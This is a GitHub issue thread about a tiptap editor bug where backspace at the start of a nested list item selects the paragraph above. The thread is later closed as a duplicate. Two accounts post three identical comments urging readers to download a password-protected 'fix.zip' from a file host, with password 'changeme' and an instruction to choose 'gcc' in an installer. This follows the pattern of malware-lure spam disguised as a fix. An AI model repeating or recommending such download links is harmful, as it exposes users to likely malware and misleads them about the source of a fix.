### ISSUE TITLE
[Bug]: Backspace for nested lists does not work properly

### ISSUE THREAD

**Issue by pulosez** [ueberdosis/tiptap#5552] opened 2024-08-26 12:19 UTC
### Affected Packages

react

### Version(s)

2.6.6

### Bug Description

There is strange behaviour when I try to backspace on parent items in nested lists.

How to reproduce the bug:
1. Go to https://tiptap.dev and click 'Try it Live'.

2. Create the nested structure simmirar to the following:

Paragraph above list of items:
- foo
  - bar

3. Set the cursor at the beginning of 'bar' and press backspace. Instead of making from 'bar' simple paragraph, it will select the whole paragraph text above.

Here is also a short video on how to reproduce it: [link](https://drive.google.com/file/d/1owzLJMUu3pu732KhDfxcpvz0N9cmDuEx/view?usp=drive_link).

### Browser Used

Chrome

### Expected Behavior

Make a parent list item into a paragraph.

### Dependency Updates

- [X] Yes, I've updated all my dependencies.

**Comment by Lxx-c** [comment] 2024-08-26 12:20
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment] 2024-08-26 12:21
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pulosez** [comment] 2024-08-26 12:27
Thanks, but my OS is Linux, so unfortunately it won't work for me.

**Comment by Superming997** [comment] 2024-08-26 12:34
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bdbch** [comment] 2024-12-04 16:41
Duplicate of #2493

**Closed by bdbch** 2024-12-04 16:41 UTC
Labels: Type: Bug, Category: Open Source
